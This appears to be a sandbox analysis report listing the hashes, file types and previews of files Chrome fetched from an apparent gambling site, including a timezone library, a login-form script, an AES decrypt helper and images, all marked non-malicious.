                                                      Preview://! moment-timezone.js..//! version : 0.5.10..//! Copyright (c) JS Foundation and other contributors..//! license : MIT..//! github.com/moment/moment-timezone....(function (root, factory) {..."use strict";...../*global define*/...if (typeof define === 'function' && define.amd) {....define(['moment'], factory); // AMD...} else if (typeof module === 'object' && module.exports) {....module.exports = factory(require('moment')); // Node...} else {....factory(root.moment); // Browser...}..}(this, function (moment) {..."use strict";.....// Do not load moment-timezone a second time....if (moment.tz !== undefined) {....logError('Moment Timezone ' + moment.tz.version + ' was already loaded ' + (moment.tz.dataVersion ? 'with data from ' : 'without any data') + moment.tz.dataVersion);....return moment;...}.....var VERSION = "0.5.10",....zones = {},....links = {},....names = {},....guesses = {},....cachedGuess,......momentVersion = moment.version.split('.'),..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):11516
                                                      Entropy (8bit):4.191865841156002
                                                      Encrypted:false
                                                      SSDEEP:192:gxlzn1ISS/yakFAn1hQu66H1Ka1t4l/O3a6Nr:Pcu6IQM
                                                      MD5:2C96D80D1A2FE2DA79B651FAF7CC7A61
                                                      SHA1:485EC6F90E4BBFEB5367ABBEEF8532C3D38929C4
                                                      SHA-256:F5A6748DC5B42148F41FDC03097644A19E8764B339C9E003BDF7D4820EB8A7EC
                                                      SHA-512:1C464550458CFDE52E6E47D5613BBB229FE3F0A483BBCC22CE180EFC00977E0F7DFA737C4D657B529013E78995DB0E8FE2B2D287935A2E2F2A05FDE15925F6D5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/unite/encforms.js?ver=1723544858
                                                      Preview:(function($){. let logoutlock = false;. $(document).on('submit','form[action="/login_action"]:not(.hide)',function(evt){. .evt.preventDefault();. .if($(this).data('isSubmit')){. ..return false;. .}. .var d = new Date(), validcode = Math.round(Math.random()*10000000), _self = this, callee = arguments.callee, errormsg = '';. .d.setTime(d.getTime() + 1E4);. .var str = "boscookietest="+validcode;. .var domain = location.host.split(':')[0];. .document.cookie = str+'; expires='+d.toGMTString()+'; domain='+domain+'; path=/';. .var regex = new RegExp(str). .if(!regex.test(document.cookie)){. var msg = trans.common.cookieClear;. if('swal' in window){. swal({. title: __('loginTrans.error'),. html:true,. text: msg,. type:'error'. });. }else alert(msg);. ..return false;. .}.. .d.setTime(d.getTime() - 1E4);. .do
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 1 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):997
                                                      Entropy (8bit):5.810889627113277
                                                      Encrypted:false
                                                      SSDEEP:24:gr1h4SHWwh82lYSKwN6vYnjVNgUUT3XyJ3VRWN6v/GN:WKS2vnLi9jpUeJ3Q+6
                                                      MD5:955BEB1B9BA757816ADDCCFA9AA004DB
                                                      SHA1:29BB129B21488EDE5A1871ADC1EA976B5D8BE43E
                                                      SHA-256:C86644377BC0E1C60D81D1B91422BE4A6F042623FBF16984D98FBAC0B2893D99
                                                      SHA-512:F3CBF35FEC155114E23785A11E576B53CFA908317CA2B2272C01188A265F547ABC5347C6199F77FFF0F29466F9FE0BE522E87BB34C8BB739998E4673BC56D6E5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/footer/footer_spiler.png
                                                      Preview:.PNG........IHDR...............!p....tEXtSoftware.Adobe ImageReadyq.e<...iiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:75C8186921AAE311B4D0B41277BB2166" xmpMM:DocumentID="xmp.did:9D913CF2AFCE11E3A70D834307AB356B" xmpMM:InstanceID="xmp.iid:9D913CF1AFCE11E3A70D834307AB356B" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:eab1b3ca-5aed-2748-ac5e-b3ebee2c1920" stRef:documentID="xmp.did:75C8186921AAE311B4D0B41277BB2166"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.[.e....IDATx.b...f.....0..V..C.......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:dropped
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 204 x 23
                                                      Category:downloaded
                                                      Size (bytes):427
                                                      Entropy (8bit):6.827729953332778
                                                      Encrypted:false
                                                      SSDEEP:6:7yASlTql1l/UkO6Wu6SPJitadAC83JxOOSdYrOr+vO34dk4OWJDYu103b/CkOE:mtYdBzCB3JxZOr+RPJDs3b/CPE
                                                      MD5:91A7A64BC6D0F0C949765742FD7CBA4A
                                                      SHA1:5EE79F81D97AA29162A5CBB8939A9F8109C821A1
                                                      SHA-256:A0FC8D019B9C5116C35B5A3ED7221814A8EBD3C8CE5E2063333305B48413A06D
                                                      SHA-512:48337DF1E9E7483BD7A0620F0DA1C3353AB634C46E11D30BF1CB4B654EB131B91E8B7214DD4C569844AAA81CC8600218115371ADB826FB7E86C6D58AF1AE01AB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/en/204x30-live-streaming-02.gif?ver=1683086141
                                                      Preview:GIF89a.......M..........!.`?.u...k..0.j...\.....z...........U.............................................!..NETSCAPE2.0.....!.......,........... $.di.h..l.p,.tm.x..|....pH,...V..8-...iY.,.X@r..>...W..<.&3..fk..8..6.!.os..2 mmUr..7tb.d}..#y.M....4.%weg$fu....).#...".."........_.x_................f.._..."..._..........[.d".....$...F.#._.f..`..I.#.l....Gp..Y..*......$.U.b.fw.... b.r.C.0........ ....0c.I...8s....;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 204
                                                      Category:downloaded
                                                      Size (bytes):953
                                                      Entropy (8bit):4.889161594783408
                                                      Encrypted:false
                                                      SSDEEP:24:o9T/oV+jpUirgPosqkLcBNls13t5+BXuUlYea:oVY+jqiGoTkLcB813rea
                                                      MD5:0C494AC95BB7EFED1BFD157C74EDF4F1
                                                      SHA1:5A39F256A6BD4AE42AF00EDE6CC02046247ADE55
                                                      SHA-256:8BD961EA74A57AD2595A735D5A413CAA795D27DB0C0B530D749840665B0F4E0D
                                                      SHA-512:215412F750059B020413CACF06B22F3441F9D30A1F9CD3562BB8ACF12EBCB1AFAB8462A97060CD547AFA4B618E010A6618071B85D6DA1C53C809AC8872C29AC1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/bg-sports-right.gif
                                                      Preview:GIF89a........iM.zZ.{[.lO.mP.hL.vW.wX.qS.kN.nQ.rT.pR.uV.sU.xY.jN.oQ.jM.tV.yY.yZ.kO.xX.tU.oR.nP.uW.iL.sT.pS.yY.z[.jNB...tU.wW.lP.@,.oR..s.aG..p.eJ..r..r.bH.cH.sT.tU..k..c.wW..i.hL..`.{Z.dI..e..f.iM..o..n..m.fK.~\..q..^..].pR..b.yY.jM.._..g..h.zY.gK..l..j.}[..d..a..l..a.cI..m..i.qS..q..g.yX.rS..n..o.gL.uV..^.|[..h..k.xX.fJ..j..n.uU.iL.vW.pR..e.._..c.rT..k..h..p.dJ.vV..`..p..s.mO.}\..d.|Z.qR..b..f.bG.xW..c.......................................................................................................................................................................................................................................................................................................................................................................................,........@............4..`...."h 0.B...........7L...!...(.H.!.F. .v.`.............0`.QAJ.*-$`..cF..^..)Sf..4?<.j.&B.9snh@v..<{:(.`...A=....D..F.LDJ......e.T..O.*...;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):23571
                                                      Entropy (8bit):7.984339543026751
                                                      Encrypted:false
                                                      SSDEEP:384:5gObQLvMtWQhCfqNrZRbxozUnDQ+5ZEeY7UuOAJz5xullxE9aiNRYEMPVWCzPkaO:CO/heqNrr9o4nDQ+f7GV11x6boNukkMP
                                                      MD5:7BF9C0C388427845D84B11373F780AFE
                                                      SHA1:48D384B809438216D51079855972A98B7D56BD32
                                                      SHA-256:57BE63F528032D92A38540ADD1AD35E86A630C0940DBA0B5B61F2DBC7937B932
                                                      SHA-512:BE12137EFAE41303F49A5AACE914DB59932A14050C00878A4834CCF9881181BEE96BF60A7C7A0A7665FCECFF694D6DDAD9B22A470279D7CD3F8657AA7434EC4B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_TreasureBowls.png?ver=1728355170
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE......7..-........Z!.Z".........[!....3A....F&.!..O..;6.-R.B+...................'`.............D.....=Q....v..f.....K......6......`&p...&e#...9..'..........8.^...p:. ...B[.....U..........l.....6^-r..Sz..%....a....GU..Ec..^/.f,l<..V..sJ.....%n..a*.......z.L$a...D.n..v".v..(...R..y^.p..(...R...A..J..OUa...X6c...y..!......?.W...o..$.C..m.G...<..h9.#..$.K..C|.R......@.....9,ID....0....k....bQ0......$......_..d.09..X.....9\g....V.?A.QE.].o.A!t.`..Mg`.....SXwdt"!\..._....`F}.. ,2.....|..o.}..',........Xio..e&.pw.dc......@....cT,N.....KO..H).3=.w.l.........<n...(..........RYt.....2.....:.#...K..>..~G.."-..........rF.......*...........^lD/V3.....E...R..x:.V......l..........*..tq.>u.*5..{..q.S..m..j..g @~..o..?..N.7...E.........a-^6.....tRNS..........[q.4.. .IDATx...XSW...&.q..)..i.2!......B.i.0...K.3*Hc..I...L(...N+-..-....KQA..6( .B...B.GpF.:..{.jOo.L..];...9.....@...Y{..{]ko.=.r....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):92
                                                      Entropy (8bit):4.992387809963337
                                                      Encrypted:false
                                                      SSDEEP:3:mSuuBehkPt0MTG42KtKMk1kD9G8G:mS5BeyPtgOKMkuDk8G
                                                      MD5:D41FAE38B6E17BF8C35854190B39F8F5
                                                      SHA1:D88A2D1D01D1574D0CB0AD8E87692B448E426D19
                                                      SHA-256:9560598DCC79B0585967C73436359976FE19EDCD8177C5C15E2EE67D51593C08
                                                      SHA-512:DF6F671DCA064550B92ADBB4BE07A60110274DD8DDA262E5C16B4AE7D72A467AFED2D787B77B11BC01781BE0EFB5F21BA2C616BA17E8E46CDA65E3EFF320E3CD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgly8STCB-jtNBIFDcuKYSYSBQ3cYY_6EgUNUO56vRIeCS2_uAhphDlSEgUNy4phJhIFDdxhj_oSBQ1Q7nq9EhAJYPpGsUwvIB4SBQ390W4t?alt=proto
                                                      Preview:ChsKBw3LimEmGgAKBw3cYY/6GgAKBw1Q7nq9GgAKGwoHDcuKYSYaAAoHDdxhj/oaAAoHDVDuer0aAAoJCgcN/dFuLRoA
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 140x250, components 3
                                                      Category:dropped
                                                      Size (bytes):7173
                                                      Entropy (8bit):7.913323959603938
                                                      Encrypted:false
                                                      SSDEEP:192:wNaCidELZVEzd0KwuQNxH9c20LWKgeDHbV:/CTw03u8H9OLVDHbV
                                                      MD5:4FEC7E63C0ED57A6975AF880A35714CB
                                                      SHA1:2CC0C84C28641B06AA1E5EEFD1F77B60EA5EB798
                                                      SHA-256:C759B514C10E9FD6839F0C79A7B6F5B19C3897EC9221F7583F826B6A2F2CB633
                                                      SHA-512:65E6EB9F660F0BAA97555CC5F40AAB884D4953036FFB0B150E903E071902F5741590522EB4383228C74734B3D90021ECC6067EFB23335E70BD057BF34CFA553D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......Exif..II*.................Ducky.......<......Adobe.d.............................................................................................................................................................................................................................................!.1A"Qa2..q......Br#3..Rb$.C...D......................!.1A..Qq"..a......2.R.................?...@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.Pd.|(6..O.S+.,lq....P(.....@.P(2.'A..Z..;..........cjy.X....>.{i$>gB@.+.....t..=,_JnaP..PY...H...m.Ey-..'.....\......J..Wf.....S.nO..W.my....u.{.`.gw......BZ2...R....%.b<]....I}g....*....7Q..:.....V/..Vq5j..Z3.M....-.....$:.O....b.........NW...M.m5..|C.....E...j...........HR....r7!...t....V.%.o0.....C...D..k0..%..@.P(=.......P...=.k....]2.X.|^:8.i..R.}..i....^-..N....u.a2....c KxK).....j..=..n....gOT..zV3....9Y..Bf..?.+/V...Tq.$U...g.n..[n"..U.q.....v|g.}s....."@..o+6.....I...>.m.s...9..z+.....?...[3..K.g.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (1434), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):196335
                                                      Entropy (8bit):4.691383562126578
                                                      Encrypted:false
                                                      SSDEEP:3072:olpkvlaDD/DCD/DCD2iqWCPrMBq1rGPuAZDDD1DDWoST+piMhrlon5Blu4hK:CkbW0sNpiMx
                                                      MD5:BC45C47C99FE4D26B2B24E46CEC399AD
                                                      SHA1:221067A4147ECE74B03934528AD61BCD4026E477
                                                      SHA-256:4A65C2AF68E89944C3DA128C9B329596D930CE09DC9B8BA726B640D812E1FD88
                                                      SHA-512:1658E474170022D40E698A422F024B4872BFF33C78AF1DBE98DF3A6A99A0F1CD1EB36725AC9FCA7BC1264EA491D0A19A2EE0A3A952ADBA4ABA3242C06F830F93
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/custom/moment-timezone.js?ver=1606790105
                                                      Preview://! moment-timezone.js..//! version : 0.5.10..//! Copyright (c) JS Foundation and other contributors..//! license : MIT..//! github.com/moment/moment-timezone....(function (root, factory) {..."use strict";...../*global define*/...if (typeof define === 'function' && define.amd) {....define(['moment'], factory); // AMD...} else if (typeof module === 'object' && module.exports) {....module.exports = factory(require('moment')); // Node...} else {....factory(root.moment); // Browser...}..}(this, function (moment) {..."use strict";.....// Do not load moment-timezone a second time....if (moment.tz !== undefined) {....logError('Moment Timezone ' + moment.tz.version + ' was already loaded ' + (moment.tz.dataVersion ? 'with data from ' : 'without any data') + moment.tz.dataVersion);....return moment;...}.....var VERSION = "0.5.10",....zones = {},....links = {},....names = {},....guesses = {},....cachedGuess,......momentVersion = moment.version.split('.'),..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 15902
                                                      Category:downloaded
                                                      Size (bytes):4247
                                                      Entropy (8bit):7.961963471480463
                                                      Encrypted:false
                                                      SSDEEP:96:zzMe0wQmehu8OImcLkCtJ946s/6k5dsWc2wHd9Qeyr+HfbjQNhuIzyJqYqkyEp4:8Uesl4ftJ94ck5dsWq9ieFMhuIA2kHS
                                                      MD5:987459BE68C16A53B3A0519E050A0333
                                                      SHA1:9351CCCFA1668C322B5C876C03BE292CA0568F72
                                                      SHA-256:7338F8628F4526C59B385AF1FEA0A1EAB33C034E637BAD1B509ACD241E17DC70
                                                      SHA-512:B8B90CAF8892F352C1A3C8839B436F330B7C1900C025C5420E9C9654C51262557F643CEE1B690C24A4E82FC2AB9565B5458DDC235403624F8D417A8BFD600F04
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/common/bet365_style.css?ver=1684314915
                                                      Preview:...........[.n.....SlE...-ER.%.....vZ.n....%.$.Z.K...^...e.!}."}..h.........4....ggg..w~g...:*...v.2<;xto./nn..A..*,...4......X...U.M.......w.b..F'..I.^'.j....:...6Iz3..~..w....?../?..o.....d^.e....G....~......@..v.a...m.X$..!.AY..@.u...Y..B...QAK.?..,...(..Ivu.D.=..wU...y.UI.,...t...y..Y...O8....U.e.6*..}.>....`.U...4.P.....}.../.d.|....+f".F.......hv0....q.ZW.k.y.&."~7.....d..`.......f.;o.2!.G.2Ow...qX..ip"........px.}.P5..ow,.(..T........_.."....>.k....N.5..S.....X....(.W.<.%.......D...p0c...r.F.YA.?.$..]..Q.d.t=2V.V..U2..ZF...'.....as..k..,O..1......U....c....t.../3.....`..4.O...8.A..rfIQ^.)....Y.ha..,/.(!x.*.....`....h<.8a.PO.".....d.Z"...p|68y.H..C....,/6QJt.!Bw...h..0J....M.X....R.k..,.....X>&,.B.&.%i.RH..@.@."..U..4_.$oF..3#.e...<.B.$..%U....w..;50..'...].;XHs.....f.5.....V.8..KN2#.Y...6.$x3....F.."....+....gc.V.P....n.EoY.B@`...w.r.......+.SBZ...G7.;.1...Q...X.o..y..\......VV@H.S.....F..zW#.b.q..$..Q.....2~Y0*IR......'DQ.3...R.....:
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):399
                                                      Entropy (8bit):6.033338487326961
                                                      Encrypted:false
                                                      SSDEEP:6:6v/lhPknzIoaRTl+u/L2RUwQhmcEIqh1mZQRxnuXd/+Wh2wjcPTdtK4nMq7yp:6v/7graLr2RUBhmcFbmgGzlM5
                                                      MD5:0F2EAF9D1679E974F3B610E3ACB1171D
                                                      SHA1:65A30DB81DD37647FA955076AEEB175B9BE1D53D
                                                      SHA-256:8BF266FADC7AFBEC1F2A3A47756EAABFE3306102696B8303E585467C4EBD2BE7
                                                      SHA-512:4370540454F668D4A26ABC09B7F863C45070E8AC8144A69276481028BD28C0696DED2027C78899AC9DB6AA7B2B4C19D7C08901782E52159B77AEA9DAC8214A4C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/common/search.png
                                                      Preview:.PNG........IHDR...................cPLTE....................................................................................................E..... tRNS.X........vE...|obRJ>/...gL;&...J.....IDAT(.e.Y..0.DCHdQ....w.SZl...WWO*.....u...Q.~}....)...r.@&~.\}yr.w..>.nA+...C.P. ...L2.!?d,.....{. ....w.......KW.{.Xw......e....^..sk.tn.[V.X=6Q+..F.?.H../.*.cC..IF.G._.`._.f./...e.$......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 224 x 91
                                                      Category:dropped
                                                      Size (bytes):18406
                                                      Entropy (8bit):7.675664322235163
                                                      Encrypted:false
                                                      SSDEEP:384:XbZPuG48/hDaZaDY76y8MLtbOYh5m/hDaZaD3MLtbOYhA:1GSdaZX76yPtSYhWdaZNtSYhA
                                                      MD5:E421930A8A259A84E6C345E5A139C696
                                                      SHA1:EF5A4B7D2CED985D3E23108030394C34E737A051
                                                      SHA-256:84B7DEDE23DAB781AB48EF1101245D9DD11E8D3BD9BC74B730A37D3031819F69
                                                      SHA-512:D3278E15647C80A89A53CF97682AD94DBDB44B3AA28327B53C80280E6E09F83D21BA6D4B7948C8FEB37D3E467DA1F3C518BE73921DC5B82D96A840B1C9B8F0F0
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a..[..........O....,N.M.......=...S..#.Z$.i..*#.Zb....C.~..$......k.EO.M..5@.R#.h..!.. ..&.....(r..3.s..01.U1.V..;...@.Q.....9..7..^.H..3...1.r{.@...z.A@.|.....l..].I...^..........l.D{....63.UR.L..%..?..]q.D.. .. ..]".Z..!b.G..^..)..2a.HB.Q..;y.@6.TK.N..\).X..[a.G..!..2h.E...I.O9.S+.W..#B.PG.O..5..,..%>.R*.X.....*V.K..(..>`.H..\..'k.Ez.@.........!.Z...<.R..1..]......2.U..<x.A/.V...../..=...].I..!..9[.I4.Ul.D..:c.G|.?.."'.Xo.CA.QF.OX.J..=..4..9U.K..$M.M .Z...3.UP.Lw.A...&.Y..[...........^.......................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,......[.@...E..H......*\....#J.H....3j.... C...........B........`...%Hd.9..."].X........<8.(P...H......T9.e..:X.!.1@..hC.H.V....p.ek"@A.....5#.......L......+.@.b...*.......;...3c.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text
                                                      Category:downloaded
                                                      Size (bytes):531
                                                      Entropy (8bit):4.811119937201228
                                                      Encrypted:false
                                                      SSDEEP:6:AL2XwANrdQIYkSRUQbdfE1AkeYU71BOAyJRUYU71BYeAQPdlMJlnLgdG07dhimJK:ALawANY1Ru6guODvRuYzQ1lGcdGQimJK
                                                      MD5:1D1D23F897C7F9FA4B24EEB8159D7E21
                                                      SHA1:9C6AB5FED65ABE81454978F1E844C4F36D61A1C7
                                                      SHA-256:8DA1DB8ADC85DC835413880C71CC811C762E48018590F9A991115E83A722C869
                                                      SHA-512:4D258CF5B37B503615A1373AEBF3474EC8F94351455729665223A9318067CA6B815D0BF3C265EAD937660BFB3B0E75B25F450EF1B235A64B32D87DF01E1B8E32
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/js/www/decrypt.js
                                                      Preview:function cryptoJsAesDecrypt(encrypted, pass) {. var key = CryptoJS.SHA256(pass);. var ivAndCiphertext = CryptoJS.enc.Base64.parse(encrypted);. var iv = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(0, 4));. var ciphertext = CryptoJS.lib.WordArray.create(ivAndCiphertext.words.slice(4));. var decrypted = CryptoJS.AES.decrypt({ ciphertext: ciphertext }, key, {. iv: iv,. padding: CryptoJS.pad.Pkcs7,. mode: CryptoJS.mode.CBC. });. return decrypted.toString(CryptoJS.enc.Utf8);.}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):4286
                                                      Entropy (8bit):7.838008820921733
                                                      Encrypted:false
                                                      SSDEEP:96:xoPBzDShWCE2mSPbB+HsXhm6BSkBzNcMf3mqm/zWe:xWZ3QPPxTSkBx+lLn
                                                      MD5:24BBF254431790C6771ACC8BF6E2D954
                                                      SHA1:0D4A495FC4169B5CF8F37521191F51D6223B08D4
                                                      SHA-256:A2110925431CD9423EEB7775CD546C03A89D2F6DC33684783844CA20519A9E67
                                                      SHA-512:D297C1F14E58BE8B73D62A5D8E173C3558B60983681117C9AA0A1395E1E5644129B27A3375400FB4439BC42394B4FEB025EC3C7FAA811FB6D091CFFECCE25346
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....:PLTE....i%.............d&............................b'.............W+....h%.......V,......................O/.m#.j$.......76.{..B3.S-.............@3..........A3.......L/....h#.M/.......96....V..D2.18.a(....C3.09.............G1.<4..../9.v ....47.O..Z..g..l.....}........~.............o#....z..a.....@3......M....{.....K..F....|.................66./9.......;5....{..@3.......N..t!....W+.C2.x........[).G1....l$....`(..........d&.p".S-..........i%.......J0.......e#.......g!....a&.g.....s".......Q........c%...g..f....h.....................~..c..x..a..^..o..s..ZA....mtRNS....]<.^]./........t&.I..a^U...)]..|]S73"..jF...........\QB....qd.........y.......y..n.....h.........IDATx..............................=..i*..8~.Z.h..B.j..D....2.D.............GP.(h..P..~7.s.....'.k|._B..?.w9...........( v......(.?W..U<f.."..rssK........9z..TRX.OW.....06`._.}.V....D$XOhN.N.N..z..\.p..g...Ur.....{.yJ^.|.Ps_.<.~...-m.-L=......z.===---.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:downloaded
                                                      Size (bytes):54542
                                                      Entropy (8bit):7.980815626986212
                                                      Encrypted:false
                                                      SSDEEP:768:jmKWfj8/iyUjQoLCW4JHskD0ZM7X3auY2PlUxQ02qIo82Pelh6XkBtbnvb8XdM5:MjvyCP4mkD0O+u3PexQ01Kzr7vbQM5
                                                      MD5:5069477E3015FC550921A25B3C586D94
                                                      SHA1:C692A04DFB6442A8403D0431F4C8306B5E298AD0
                                                      SHA-256:C09688CF2CFFA911814C4E9EB2A76AB8133E9918AF59DD9BD9B70B2FF91CC5BB
                                                      SHA-512:0091ABBF3F47A65D850FBFEA714628A8602F9E68FB85CFCDDCB6694E8EBF4CF406EAF38772B798C7C49615D9F6E08B8B9380225752A32A2BADD51C10EFD58FBD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner6.jpg?ver=1606891697
                                                      Preview:......JFIF.............C....................................................................C.....................................................................................................................................................................................................................f..!.X.#`..........................PLP.L..........E....E.0...9.w...49xt...........................................=.[.A..FD.k..ClE..8.u..0.7XP.+#..`.........t^..1a..LL......................QxE....v..F..A.....a. ..K......r.#.....|Nx.h...B.3....gKc.M.I..........L..Y....Qq..z)....H..............p...3..........\.+............ ........x....0.CT..CXh...}...2.>?....+.#+y.:.g....t.....*.........;>X.M.Y..u+..j.K..o.r....................iwS.i...eXn.T..'..z+....z]....Wq.mxv....v..oU...~2J........>..wO.?H.1...]n.[.a.........5......9...{Z.W.U.7%+S......:@....|.3.X..-...V....[.Q{~v....>k..................Uw..x..;..W....j......E..Vo.rJ.g..p../Us........6.0.......x"N.A...]..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:dropped
                                                      Size (bytes):1933
                                                      Entropy (8bit):5.187294989277712
                                                      Encrypted:false
                                                      SSDEEP:48:c8zw3d4TZPZtFOWDERjeJFmgZRL0KtTL2oMBCm7:fYRjYEK0KtWtBCO
                                                      MD5:6A579F2E4D3B31B3EA017E7B03A475DD
                                                      SHA1:8D9A6430FACE051AE1365D421F15C60CFF36613C
                                                      SHA-256:CA0D1288490DAB47EB98606D7E519B4BE96E1D5F354B8CF4A6EF39DD1846C41C
                                                      SHA-512:E5C65863509FB786D1A2AC8A1C0E0EC1446158037079A067EB6976040A0D912E326C2254E7968A7E22AE794D3ADAD6B9BFCCBD2A4EB35DAD622676D3A989D742
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:$(function(){..location.hash.split('#').pop()=='yzmError' && swal('............'),location.hash='' . || location.hash.split('#').pop()=='loginError' && swal('............'),location.hash='';.});..function tanchu(chaunti) {. guanbi();. $("body").append("<div class='baibg' onclick='guanbi()'></div>").addClass("ovn");. $(chaunti).show(0, function() {. $(chaunti).css({. "top": ($(window).height() - $(chaunti).height()) / 2,. "left": ($(window).width() - $(chaunti).width()) / 2. });. });.};..function guanbi() {. $(".tanchu,.denglu_tc,.qdhb").hide(0, function() {. $(".baibg").remove();. $("body").removeClass("ovn");. });.};.$(function() {. $(".js-guanbi,.baibg,.icon-close,.qdhb-close").on("click", function() {. guanbi(). });.});..$(function() {. $(".js-zcrs").each(function() {. var datanum = eval('(' + $(this).attr("data") + ')');. var x = parse
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):30946
                                                      Entropy (8bit):7.990014219708387
                                                      Encrypted:true
                                                      SSDEEP:768:60A+SuvH52/HQI5XCc/d087817+GQrPlLyP3aAbjEojX:i4vH52PQuXCC087i+fAfjX
                                                      MD5:A1D14538935AC159D1709A9C843766D0
                                                      SHA1:831CC10C99A5A0C7ECF90F2655365A97EA80C838
                                                      SHA-256:54C6DBF199652F8B87F736EFEF104D89037B90A295D70C117E1D1988FC7809F0
                                                      SHA-512:9FFC792E2DFECB4237467153B22BBFB24551F48A7F3D3912618B4C797817D019A9D9CDE5ED65F6479765989AEFC07654561B1DC8EE0902330ECEE7BD0C0AE859
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/j9nzkkbjfaz1a.png?ver=1673334590
